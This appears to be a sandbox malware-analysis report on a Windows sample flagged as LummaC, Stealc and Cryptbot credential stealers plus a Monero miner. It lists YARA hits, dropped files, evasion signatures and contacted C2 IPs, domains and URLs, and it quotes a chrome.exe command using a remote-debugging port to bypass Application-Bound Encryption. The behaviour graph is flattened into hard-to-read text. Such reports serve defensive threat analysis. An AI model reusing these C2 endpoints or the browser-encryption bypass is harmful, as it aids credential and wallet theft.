Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Yara detected Credential Stealer
Source: Yara match File source: 00000028.00000003.3414474083.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2880963508.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3134050190.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3413732620.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3006254804.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3414123368.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3101184514.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3360917053.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3354868759.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3133753282.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3417667895.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.3421730928.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2936457568.00000000014D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3101013930.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2880169055.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3907f97605.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3907f97605.exe PID: 4092, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 04dc07bf76.exe PID: 2300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 04dc07bf76.exe PID: 5160, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 3907f97605.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000027.00000003.3061120785.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.3202171699.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ee5495637.exe PID: 420, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561837 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 144 xmr-eu2.nanopool.org 2->144 146 aXoOEZERyLjmcASXxTaZGLMxwNjgk.aXoOEZERyLjmcASXxTaZGLMxwNjgk 2->146 148 15 other IPs or domains 2->148 174 Suricata IDS alerts for network traffic 2->174 176 Found malware configuration 2->176 178 Antivirus detection for dropped file 2->178 182 19 other signatures 2->182 11 skotes.exe 4 35 2->11         started        16 file.exe 5 2->16         started        18 3907f97605.exe 2->18         started        20 4 other processes 2->20 signatures3 180 DNS related to crypt mining pools 144->180 process4 dnsIp5 160 185.215.113.43, 49753, 49759, 49791 WHOLESALECONNECTIONSNL Portugal 11->160 162 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 11->162 164 31.41.244.11, 49765, 49793, 80 AEROEXPRESS-ASRU Russian Federation 11->164 132 C:\Users\user\AppData\...\c7f41aa061.exe, PE32 11->132 dropped 134 C:\Users\user\AppData\...\04dc07bf76.exe, PE32 11->134 dropped 136 C:\Users\user\AppData\...\3ee5495637.exe, PE32 11->136 dropped 142 11 other malicious files 11->142 dropped 214 Creates multiple autostart registry keys 11->214 216 Hides threads from debuggers 11->216 218 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->218 22 fMb18eF.exe 60 11->22         started        26 QwGWuQZ.exe 11->26         started        28 c7f41aa061.exe 11->28         started        40 4 other processes 11->40 138 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->138 dropped 140 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->140 dropped 220 Detected unpacking (changes PE section rights) 16->220 222 Tries to evade debugger and weak emulator (self modifying code) 16->222 224 Tries to detect virtualization through RDTSC time measurements 16->224 30 skotes.exe 16->30         started        226 Query firmware table information (likely to detect VMs) 18->226 228 Tries to harvest and steal ftp login credentials 18->228 230 Tries to harvest and steal browser information (history, passwords, etc) 18->230 232 Tries to steal Crypto Currency Wallets 18->232 234 Binary is likely a compiled AutoIt script file 20->234 236 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->236 238 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 20->238 32 LionGuard.scr 20->32         started        34 taskkill.exe 20->34         started        36 taskkill.exe 20->36         started        38 taskkill.exe 20->38         started        file6 signatures7 process8 dnsIp9 110 C:\Users\user\AppData\Local\Temp\Unit, PE32+ 22->110 dropped 112 C:\Users\user\AppData\Local\Temp\Love, DOS 22->112 dropped 114 C:\Users\user\AppData\Local\Temp\Wow, data 22->114 dropped 124 44 other malicious files 22->124 dropped 184 Writes many files with high entropy 22->184 43 cmd.exe 3 22->43         started        116 C:\Users\user\AppData\Local\Temp\Rocky, PE32 26->116 dropped 118 C:\Users\user\AppData\Local\Temp\Vermont, data 26->118 dropped 120 C:\Users\user\AppData\Local\Temp\Vatican, data 26->120 dropped 126 5 other malicious files 26->126 dropped 47 cmd.exe 26->47         started        186 Multi AV Scanner detection for dropped file 28->186 188 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->188 190 Machine Learning detection for dropped file 28->190 204 7 other signatures 28->204 192 Antivirus detection for dropped file 30->192 194 Detected unpacking (changes PE section rights) 30->194 196 Tries to evade debugger and weak emulator (self modifying code) 30->196 206 3 other signatures 32->206 49 conhost.exe 34->49         started        51 conhost.exe 36->51         started        53 conhost.exe 38->53         started        152 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 40->152 154 fvtekk5pn.top 34.116.198.130, 49792, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 40->154 156 3 other IPs or domains 40->156 122 C:\Users\user\AppData\...\service123.exe, PE32 40->122 dropped 198 Attempt to bypass Chrome Application-Bound Encryption 40->198 200 Query firmware table information (likely to detect VMs) 40->200 202 Binary is likely a compiled AutoIt script file 40->202 208 3 other signatures 40->208 55 chrome.exe 40->55         started        58 taskkill.exe 40->58         started        60 taskkill.exe 40->60         started        62 4 other processes 40->62 file10 signatures11 process12 dnsIp13 128 C:\Users\user\AppData\Local\Temp\...\Ryan.com, PE32+ 43->128 dropped 210 Drops PE files with a suspicious file extension 43->210 212 Writes many files with high entropy 43->212 64 Ryan.com 43->64         started        68 cmd.exe 43->68         started        79 7 other processes 43->79 130 C:\Users\user\AppData\Local\...\Finish.com, PE32 47->130 dropped 70 Finish.com 47->70         started        81 8 other processes 47->81 150 239.255.255.250 unknown Reserved 55->150 72 chrome.exe 55->72         started        75 conhost.exe 58->75         started        77 conhost.exe 60->77         started        83 3 other processes 62->83 file14 signatures15 process16 dnsIp17 94 C:\Users\user\AppData\Local\...\LionGuard.scr, PE32+ 64->94 dropped 96 C:\Users\user\AppData\Local\...\LionGuard.js, ASCII 64->96 dropped 98 C:\Users\user\AppData\Local\...\K, data 64->98 dropped 166 Drops PE files with a suspicious file extension 64->166 168 Modifies the context of a thread in another process (thread injection) 64->168 170 Writes many files with high entropy 64->170 172 2 other signatures 64->172 85 cmd.exe 64->85         started        100 C:\Users\user\AppData\Local\Temp\662510\A, data 68->100 dropped 102 C:\Users\user\AppData\...\InnoSphere.scr, PE32 70->102 dropped 104 C:\Users\user\AppData\Local\...\l, data 70->104 dropped 88 cmd.exe 70->88         started        158 www.google.com 142.250.181.68 GOOGLEUS United States 72->158 106 C:\Users\user\AppData\Local\Temp\768032behaviorgraph, data 81->106 dropped file18 signatures19 process20 file21 108 C:\Users\user\AppData\...\LionGuard.url, MS 85->108 dropped 90 conhost.exe 85->90         started        92 conhost.exe 88->92         started        process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
239.255.255.250
 unknown Reserved
unknown unknown false
104.21.33.116
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
services.addons.mozilla.org 151.101.1.91 true
property-imper.sbs 104.21.33.116 true
www.google.com 142.250.181.68 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
fvtekk5pn.top 34.116.198.130 true
xmr-eu2.nanopool.org 51.15.89.13 true
EaUMrTLEnhJoi.EaUMrTLEnhJoi unknown unknown
js.monitor.azure.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
mdec.nelreports.net unknown unknown
aXoOEZERyLjmcASXxTaZGLMxwNjgk.aXoOEZERyLjmcASXxTaZGLMxwNjgk unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 true
      https://property-imper.sbs/api true
        http://185.215.113.206/68b591d6548ec281/sqlite3.dll true